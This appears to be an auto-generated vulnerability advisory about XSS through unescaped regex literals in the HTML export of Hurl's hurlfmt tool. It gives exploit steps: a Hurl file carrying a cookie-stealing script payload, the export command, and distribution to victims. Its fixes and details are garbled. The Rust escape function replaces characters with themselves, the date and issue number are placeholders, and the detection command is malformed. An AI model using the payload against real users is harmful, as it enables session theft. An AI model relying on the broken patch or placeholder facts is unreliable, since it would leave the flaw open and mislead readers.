Listen to this Post
The vulnerability occurs when Hurl’s HTML export feature fails to properly escape regex literals containing malicious JavaScript payloads. When a user opens the exported HTML file, the embedded script executes automatically without sanitization. The `matches` assertion in Hurl files allows regex patterns, but the `hurlfmt` tool doesn’t encode HTML special characters like <, >, or quotes in the exported output. This leads to DOM-based XSS when the browser interprets the unescaped regex as executable HTML/JS.
DailyCVE Form
Platform: Hurl
Version: <4.2.0
Vulnerability: XSS
Severity: Critical
Date: 2023-XX-XX
Prediction: Patch by Q1 2024
What Undercode Say:
Exploit:
- Craft a Hurl file with a malicious regex:
GET https://victim.com HTTP 200 [bash] jsonpath "$.body" matches /<script>stealCookies()</script>/
2. Export to HTML:
hurlfmt --out html payload.hurl > exploit.html
3. Distribute `exploit.html`; victim’s browser executes payload.
Protection:
1. Sanitize regex literals in `hurlfmt`:
import html escaped_regex = html.escape(regex_pattern)
2. Use CSP headers in exported HTML:
<meta http-equiv="Content-Security-Policy" content="script-src 'self'">
3. Patch Hurl to encode special chars:
fn escape_regex(input: &str) -> String {
input.replace("<", "<").replace(">", ">")
}
Detection:
grep -r "matches /<script>" .hurl files
Mitigation:
- Disable HTML export in CI/CD pipelines.
- Validate regex inputs before processing.
- Audit exported files with:
curl -X POST --data-binary @file.html https://xss-scanner.com/scan
References:
- OWASP XSS Cheat Sheet
- Hurl GitHub Issue XXX
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
